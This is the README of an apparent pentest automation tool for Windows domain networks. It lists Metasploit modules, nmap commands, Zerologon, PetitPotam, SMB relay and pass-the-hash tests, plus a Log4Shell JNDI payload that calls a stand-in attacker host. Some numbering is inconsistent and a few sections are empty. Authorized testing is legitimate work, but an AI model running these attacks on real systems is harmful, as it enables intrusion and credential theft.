danyk20/pentest

Pentest automation

This penetration testing tool provides a foundational assessment of your network infrastructure and the devices (PCs) within that network. It reports on network topology, identifies device-specific attributes and assesses their susceptibility to a range of well-known attacks. Results are written in two formats: JSON for integration into automated analysis pipelines and a human-readable text file for review by stakeholders.

Prerequisites:

  • Git
  • Pipenv
  • Nmap
  • Antivirus (e.g. Microsoft Defender) turned off
  • No other network services responding on the machine executing this script
  • DNS server set to one that has a record of the target domain
  • Python 3.11.2 (it should work on any 3.10 or newer version)
  • Linux/Mac

Windows-only prerequisites [deprecated]:

  • Microsoft Visual C++ 14.0 or greater (required only on Windows)
  • Windows SDK for Desktop C++
  • Only limited compatibility

Compatibility:

The script is compatible with Kali Linux (Kali 2023.1) and was developed and tested on a network using IPv4 addresses.

Settings

  • You can define known usernames, one per line, in a users.txt file stored in the root directory of the pentest folder. If no file is provided, the default list is used.

Functionality:

1. Discovers the network:

  • get information about the host and network
    • MAC address
    • IP address
    • Network info: IP, subnet mask & prefix
    • Active Directory IPs

2. CrackMapExec - Device Discovery

  • Discovering all devices that have port 445 (SMB) open
  • Storing important information about each discovered device:
    • architecture
    • domain
    • ip
    • is_active_directory
    • mac
    • name
    • open_ports
    • operation_system
    • os_build
    • os_version
  • Printing the discovered information to the console

3. DNS transfer

  • Find all DNS servers associated with the given domain
  • Attempt to dump all DNS records from each nameserver using dig/nslookup

4. CrackMapExec enumeration of permissions on all shares

Null session

  • Checking whether a null session is enabled on the network
    • it can be very useful on a Domain Controller to enumerate users, groups, password policy, etc.

Anonymous user

  • Using a random username and password, check whether the target accepts anonymous/guest logon

5. Username enumeration

  • using an Nmap script to enumerate common usernames in the domain
    • script: krb5-enum-users
    • usernames to enumerate: users.txt
      • specify usernames separated by newlines (Unix "\n")
        • Windows supports both "\n" and "\r\n" line endings in the users.txt file, but Linux-based OSes only "\n"
      • if no file is specified, the default one is used
    • using port 88 (Kerberos pre-authentication)
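As an added example (not code from the danyk20/pentest project), a users.txt loader that accepts both line-ending styles mentioned above and falls back to a default list when the file is missing; the default names are assumed from the network.json sample later in this README:

```python
from pathlib import Path

# Assumed default list; the README's network.json sample shows "admin" and "administrator".
DEFAULT_USERS = ["admin", "administrator"]


def parse_usernames(text):
    """Split users.txt content into usernames, accepting both "\\n" and "\\r\\n" line endings,
    ignoring blank lines and surrounding whitespace, and dropping duplicates (order kept)."""
    names = []
    for line in text.splitlines():  # splitlines() handles \n, \r\n and a lone \r
        name = line.strip()
        if name and name not in names:
            names.append(name)
    return names


def load_usernames(path="users.txt", default=DEFAULT_USERS):
    """Read users.txt from the given path; fall back to a copy of the default list
    when the file is missing or contains no usernames."""
    p = Path(path)
    if not p.is_file():
        return list(default)
    # utf-8-sig strips the BOM that Windows editors sometimes prepend
    names = parse_usernames(p.read_bytes().decode("utf-8-sig"))
    return names or list(default)
```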

6. PetitPotam vulnerability test

  • Uses PetitPotam to trigger NTLM authentication from the Domain Controller to the listener and then relays that authentication to a vulnerable target
  • If the attack is successful, the password hash is revealed
  • Attack type: man-in-the-middle

5. Zerologon Scan

  • Tests the vulnerability in the cryptography of Microsoft's Netlogon process that allows an attack against Microsoft Active Directory domain controllers
  • CVE-2020-1472

6. Eternalblue

  • Uses Metasploit to test for the MS17-010 vulnerability
  • msf > use exploit/windows/smb/ms17_010_eternalblue # equivalent of manual execution for each discovered host
  • Works only on Linux-based OS (Windows is not supported)
  • Attack type: buffer overflow and other bugs
    • The size computed in SrvOs2FeaListSizeToNt is calculated with a mathematical error: a DWORD (4 B) is cast into a WORD (2 B)

6. SMB Group Policy Preference Saved Passwords Enumeration

  • Uses Metasploit to test for the CVE-2014-1812 vulnerability
  • Enumerates files from target domain controllers and connects to them via SMB
    • it looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft's public AES key
  • msf > use auxiliary/scanner/smb/smb_enum_gpp # equivalent of manual execution for each discovered host
  • Works only on Linux-based OS (Windows is not supported)

7. Apache Tomcat User Enumeration

  • Uses Metasploit to test for the CVE-2009-0580 vulnerability
  • Enumerates Apache Tomcat usernames via malformed requests to j_security_check
    • The response differs depending on whether the user exists
  • msf > use auxiliary/scanner/http/tomcat_enum # equivalent of manual execution for each discovered host
  • Works only on Linux-based OS (Windows is not supported)

8. Apache Tomcat User Enumeration

9. Java RMI Server Insecure Endpoint Code Execution Scanner

  • Uses Metasploit to test for the CVE-2011-3556 vulnerability
  • Detects Java RMI (Remote Method Invocation) endpoints
    • parsing a serialised Java object → loads Java classes from the attacker
  • msf > use auxiliary/scanner/misc/java_rmi_server # equivalent of manual execution for each discovered host
  • Works only on Linux-based OS (Windows is not supported)
  • Attack type: remote code execution (RCE)

10. Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration

  • Obtains a list of all logins from a SQL Server using any login
    • By using the public function SUSER_SNAME(principal_id), which returns the login associated with that ID
  • msf > use auxiliary/admin/mssql/mssql_enum_sql_logins # equivalent of manual execution for each discovered host
  • Works only on Linux-based OS (Windows is not supported)

11. Pre-authentication SSRF (Server-Side Request Forgery) on Microsoft Exchange Server

  • Uses Metasploit to test for CVE-2021-26855 and CVE-2021-27065
  • Scans for a vulnerability on Microsoft Exchange Server that allows an attacker to bypass authentication and impersonate the admin
    • by setting a malicious X-AnonResource-Backend header and requesting a static file in /ecp
  • msf > use auxiliary/scanner/http/exchange_proxylogon # equivalent of manual execution for each discovered host
  • Works only on Linux-based OS (Windows is not supported)
  • Note: This is not a defensive test (every scan output that does not show the target as vulnerable is considered safe)
  • Attack type: Remote Code Execution

12. Impersonate an arbitrary user on Microsoft Exchange Server to write a file

  • Uses Metasploit to test for CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523
  • Exploits a vulnerability on Microsoft Exchange Server that allows an attacker to bypass authentication (CVE-2021-31207), impersonate an arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve RCE (Remote Code Execution)
    • by leveraging autodiscover/autodiscover.json with a manipulated URL path (proxying) -> allows arbitrary backend URL access as NT AUTHORITY\SYSTEM
    • Impersonates an arbitrary user by setting X-Rps-CAT
  • msf > use exploit/windows/http/exchange_proxyshell_rce # equivalent of manual execution for each discovered host
  • Works only on Linux-based OS (Windows is not supported)
  • Note: This test might have a high false-positive rate
  • Attack type: Remote Code Execution

13. Log4Shell HTTP Scanner

  • Uses Metasploit to test for CVE-2021-44228 and CVE-2021-45046
  • Scans an HTTP endpoint for the Log4Shell vulnerability by injecting a format message that triggers an LDAP connection, e.g. ${jndi:ldap://attacker.com/malicious_code}
    • The attacker manipulates the logger into interpreting a malicious string
  • msf > use auxiliary/scanner/http/log4shell_scanner # equivalent of manual execution for each discovered host
  • Works only on Linux-based OS (Windows is not supported)
  • Attack type: Remote Code Execution

14. Kerberoasting

  • Uses a third-party Python script to test for CVE-2022-33679
  • Abuses a legitimate Kerberos ticket to extract the hashed password of a service account → crack the password
  • reference: https://github.com/Bdenneu/CVE-2022-33679
  • Works only on Linux-based OS (Windows is not supported)
  • Attack type: password hash cracking with rainbow tables

15. SMB Relay NTLMv1

  • Uses Metasploit to test for the CVE-2008-4037 vulnerability
  • Accesses a service as another user: relays SMB authentication requests from that host and uses the legitimate response to gain access to an authenticated SMB session
    • User A tries to authenticate, but a man-in-the-middle captures this traffic and uses the opportunity to authenticate as user A to an arbitrary service; the received challenge is redirected to user A as if it were a legitimate challenge from the originally requested service
  • Captured hashes can be found in the SMB_RELAY directory
  • msf > use exploit/windows/smb/smb_relay # equivalent of manual execution for each discovered host
  • Works only on Linux-based OS (Windows is not supported)
  • Attack type: man-in-the-middle

16. SMB Ghost Detection

17. Impacket get TGT Scan

  • This is a completely remote attack that does not use a local system of the compromised victim, but it requires compromised NTLM hashes
    • hashes have to be stored in the root directory as hashes.txt, otherwise the test is skipped
      • one hash per line
      • the format should match Responder output, e.g.:
        admin::TEST-WINDOWS10:844c2456ce8046c…

  • Remotely requests a Ticket Granting Ticket (TGT) from the Kerberos Key Distribution Center using a pass-the-hash attack
  • The scan iterates through all hashes and all Active Directory servers
  • reference: https://github.com/fortra/impacket
  • Works only on Linux-based OS (Windows is not supported)
  • Note: to generate an NTLM hash you can use www.lambdatest.com/free-online-tools/ntlm-hash-generator

Execution:

  1. $ git clone git@github.com:danyk20/pentest.git
  2. $ cd pentest
  3. $ pipenv install
  4. $ pipenv run python main.py [sudo password]

The sudo password is requested only on Linux/macOS machines if it was not given as an optional argument. On Windows you have to run the script as an Administrator.

Configuration:

You can add specific Active Directory servers that you want to explicitly include in the test. To do so, add them to configuration.yaml as a list (each IP on a separate line starting with a dash) and fill in the 'domain_name' value as well.

Example:

    active_directories:
      - 192.168.0.111
      - 192.168.0.222
      - 192.168.0.100

    domain_name: Target.local

Results:

Runtime partial results and status logs:

During program execution the user is always informed about the current state and progress: the executed commands and discovered information such as devices, usernames, etc.

Overall results:

Script outputs result of each test to standard output in following format:

Test: <test name> is [safe|vulnerable]

Duration: X.XXs

For example Zerologon scan in test environment resulted in following output:

Test: Zerologon scan is safe

Duration: 34.05s

Export into file

network.json

  • all collected data about the network
  • format:
    {
      "active_directories": [
        "XXX.XXX.XXX.XXX"
      ],
      "devices": [
        {
          "ip": "XXX.XXX.XXX.XXX",
          "name": "NAME",
          "operation_system": "OS",
          "os_version": "XX.X",
          "architecture": "Architecture",
          "domain": "Domain.Name",
          "os_build": "Number",
          "is_active_directory": boolean,
          "mac": "XX:XX:XX:XX:XX:XX"
        }
      ],
      "host_ip": "XXX.XXX.XXX.XXX/XX",
      "mac": "XX:XX:XX:XX:XX:XX",
      "net_ip": "XXX.XXX.XXX.XXX/XX",
      "users": [
        "admin",
        "administrator"
      ]
    }
    

results.json

  • detailed information about performed tests
  • format per test:
    {
      "name": "test name",
      "finish_time": timestamp,
      "expected_output": "String",
      "start_time": timestamp,
      "return_val": "String",
      "is_safe": <boolean>,
      "details": "String"
    }
    

results.txt

  • human-readable format
  • only the most important data from the tests
  • format per test:

    Test: TEST NAME is safe/vulnerable
    Duration: X.XXs
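An added example, not part of the project's code, that reads records in the results.json shape shown above and renders the results.txt lines from them, computing the duration from start_time and finish_time. The timestamps are assumed to be Unix epoch seconds and the sample records are constructed:

```python
import json

# Constructed sample in the results.json shape described in this README (not real scan output).
SAMPLE_RESULTS_JSON = """
[
  {"name": "Zerologon scan", "start_time": 1700000000.0, "finish_time": 1700000034.05,
   "expected_output": "VULNERABLE", "return_val": "[-] Target is not vulnerable",
   "is_safe": true, "details": "constructed sample"},
  {"name": "Eternalblue", "start_time": 1700000034.05, "finish_time": 1700000041.30,
   "expected_output": "The target is vulnerable",
   "return_val": "[+] 192.0.2.10:445 - The target is vulnerable.",
   "is_safe": false, "details": "constructed sample"}
]
"""


def load_results(text):
    """Parse results.json text into a list of per-test records, rejecting incomplete ones."""
    records = json.loads(text)
    required = {"name", "start_time", "finish_time", "is_safe"}
    for rec in records:
        missing = required - rec.keys()
        if missing:
            raise ValueError(f"record {rec.get('name')!r} lacks {sorted(missing)}")
    return records


def duration(record):
    """Seconds a test took; timestamps are assumed to be Unix epoch seconds."""
    return record["finish_time"] - record["start_time"]


def render_results_txt(records):
    """Produce the results.txt lines ('Test: NAME is safe|vulnerable' / 'Duration: X.XXs')."""
    lines = []
    for rec in records:
        state = "safe" if rec["is_safe"] else "vulnerable"
        lines.append(f"Test: {rec['name']} is {state}")
        lines.append(f"Duration: {duration(rec):.2f}s")
        lines.append("")
    return "\n".join(lines)


def vulnerable_tests(records):
    """Names of the tests flagged vulnerable, the lines a reviewer reads first."""
    return [rec["name"] for rec in records if not rec["is_safe"]]


if __name__ == "__main__":
    print(render_results_txt(load_results(SAMPLE_RESULTS_JSON)))
```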


metasploit

  • the directory contains one .txt file per executed test that uses Metasploit
    • the file is named after the test
    • contains the detailed output of the test, including all settings
    • lines starting with the '[+]' prefix may contain important information about a vulnerability
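An added example, not the project's Evaluation.py, that triages a saved Metasploit transcript of this kind: it pulls out the '[+]' lines and applies the README's safe/vulnerable rule (a test is vulnerable only when the expected marker appears in the output). The transcript and the expected markers are constructed samples, and the substring rule is an assumption about how expected_output is compared:

```python
import re

# Constructed sample of a transcript like those the tool saves per test in the metasploit/
# directory (module name taken from this README; the output lines are invented for the example).
SAMPLE_MSF_LOG = """\
msf6 > use auxiliary/scanner/smb/smb_enum_gpp
msf6 auxiliary(scanner/smb/smb_enum_gpp) > set RHOSTS 192.0.2.0/24
RHOSTS => 192.0.2.0/24
msf6 auxiliary(scanner/smb/smb_enum_gpp) > run
[*] 192.0.2.10:445 - Connecting to the server...
[+] 192.0.2.10:445 - Group Policy Credential Info found in SYSVOL (constructed sample)
[-] 192.0.2.11:445 - Login Failed
[*] Auxiliary module execution completed
"""

FINDING_RE = re.compile(r"^\[\+\]\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+-\s+(.*)$")


def findings(log_text):
    """Return the '[+]' lines, the prefix Metasploit uses for positive results."""
    return [line for line in log_text.splitlines() if line.startswith("[+]")]


def hosts_with_findings(log_text):
    """Unique host IPs that produced a '[+]' line, in order of first appearance."""
    hosts = []
    for line in findings(log_text):
        m = FINDING_RE.match(line)
        if m and m.group(1) not in hosts:
            hosts.append(m.group(1))
    return hosts


def evaluate(name, expected_output, log_text):
    """Build a results.json-style record (without timestamps) from one transcript.
    Assumed rule, mirroring the README's note: the test counts as vulnerable only when the
    expected marker appears in the output; absence of evidence is reported as safe."""
    hits = findings(log_text)
    return {
        "name": name,
        "expected_output": expected_output,
        "return_val": log_text,
        "is_safe": expected_output not in log_text,
        "details": "\n".join(hits) if hits else "no '[+]' lines in output",
    }
```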

Structure

attack

  • contains several Python scripts, each representing a different penetration attack as described below
  • these scripts are executed during the test

CrackMapExec.py

  • smb
  • smb null session
  • smb anonymous

DNS_transfer.py

  • dig
  • nslookup

Kerberoasting.py

  • CVE-2022-33679

Metasploit.py

  • eternalblue
  • ms17-010

PetitPotam.py

  • PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions

Scanner.py

  • Nmap
    • nmap -p389 -sV -oX - ip/prefix
    • nmap -p 88 --script krb5-enum-users --script-args realm=<domain> <ip>

Zerologon.py

  • test and exploit unpatched Domain Controllers for the Zerologon Vulnerability
  • CVE-2020-1472

CrackMapExec

model

  • python classes to represent objects in the test

Device.py

  • Class representing information about the particular device

Network.py

  • Class representing information about tested network

TestCase.py

  • Class representing information about the performed test

output

  • storage of json and txt result from the test

network.json

  • all collected information about the tested network

results.json

  • all collected information about performed tests

results.txt

  • human-readable basic information about performed tests

PetitPotam

utils

  • helper Python scripts

Evaluation.py

  • evaluation of the test run
  • comparing the expected and received results

Executor.py

  • executing commands in the OS command line

Exporter.py

  • exporting results into files

zerologon

main.py

  • entry point for whole penetration test

Pipfile

  • configuration of the virtual environment containing all dependencies and their versions
  • alternative to requirements.txt

README.md

  • instructions and documentation
  • this file

requirements.txt

  • all dependencies and their versions
  • alternative to Pipfile

About

Automation of Windows Domain Controller penetration tests using Python
